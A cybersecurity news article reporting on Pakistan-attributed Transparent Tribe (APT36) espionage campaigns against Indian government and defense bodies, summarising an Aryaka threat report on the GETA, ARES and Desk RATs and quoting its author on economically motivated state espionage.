Indian government and defense organizations are being targeted by multiple espionage campaigns delivered by the Pakistan-attributed Transparent Tribe (aka APT36), according to a newly released threat report.
These campaigns target both Windows and Linux. One active campaign employs GETA RAT (often specifically attributed to the SideCopy subgroup of Transparent Tribe). It is a dot-NET RAT that abuses legitimate Windows components (including mshta.exe, XAML deserialization, and in-memory payload execution) to avoid signature based detection.
Persistence is achieved by layered startup mechanisms that ensure continued access. “The result,” writes Aditya Sood, VP of security engineering and AI strategy at Aryaka in a report-accompanying blog, “is a lightweight but durable foothold, well-suited for extended reconnaissance and intelligence gathering.”
A separate campaign targets Linux environments with ARES RAT and system-level persistence. ARES, a Python-based tool long associated with Transparent Tribe, uses a Go-based downloader. When deployed, it performs system profiling, recursive file enumeration, and structured data exfiltration.
“Persistence was achieved through systemd user services, allowing the malware to survive reboots while blending into normal system operations,” writes Sood.
Aryaka has also detected Transparent Tribe campaigns using a newer and emerging tool: Desk RAT. This is Go-based and distributed via a malicious PowerPoint Add-In. It collects detailed system diagnostics and communicates with its operators using WebSocket-based command-and-control. “This design enables continuous situational awareness on compromised hosts, reinforcing APT36’s long-term surveillance objectives,” writes Sood.
(Earlier Go-based malware includes BlackCat/ALPHV ransomware, and the Vampire Bot job-seeker scam.)
Aryaka provides a detailed examination of these three malwares and methods of infection in a separate report. The key elements are persistence and stealth. “Initial access in the observed campaigns relies on phishing emails delivering weaponized attachments or embedded download links that lead to malicious LNK files, ELF binaries, HTA scripts, and PowerPoint add-ins,” notes the analysis report.
“Execution and loader activity abuses living-off-the-land binaries such as mshta.exe, PowerShell, and scripting engines to retrieve and execute payloads in memory,” it continues. “For command-and-control, the observed malware families – GETA RAT, ARES RAT, and Desk RAT – use encrypted TCP or WebSocket-based communication with periodic heartbeat patterns to maintain persistence.”
Sood, however, is keen to stress that such state-sponsored attacks are indicative of a global increase in state espionage attacks. This is no longer adversarial nations pre-positioning themselves in critical industries in case of, or ahead of, a potential kinetic war, but economic intelligence gathering in the face of an increasing global trade and tariff war.
“Sometimes,” explains Sood, “unexpected trade deals happen between nations, involving billions and billions of dollars in import or export. There’s a lot of money to be made for a nation’s economy through trade. India, for example, is raising its defense budget by 4% this year, and there are many nations that would like to know what they intend to do with the money.”
Aryaka’s analysis of the Persistence Tribe campaigns serves two purposes. Firstly, it provides deep analytical insight into the type of tools used in this new global trade war, and secondly it highlights that politically adversarial nation states are no longer the primary ‘enemy’. Friendly nations will increasingly target other friendly countries and their potential rival companies seeking nothing more (nor less) than economic advantage in trade and tariff wars.
The combination of nation state attacks caused by the continuing geo-political tensions together with growing economic attacks from elite groups such as Persistence Tribe, suggests we can expect more nation state attacks in the future. And the analyses of the GETA, ARES, and DESK RATs, with their focus on persistence and stealth, highlights the difficulties cybersecurity practitioners will face in the future.
Related: Cyber Insights 2026: Cyberwar and Rising Nation State Threats
Related: Pakistani APT Uses YouTube-Mimicking RAT to Spy on Android Devices
Related: ‘Stanley’ Malware Toolkit Enables Phishing via Website Spoofing
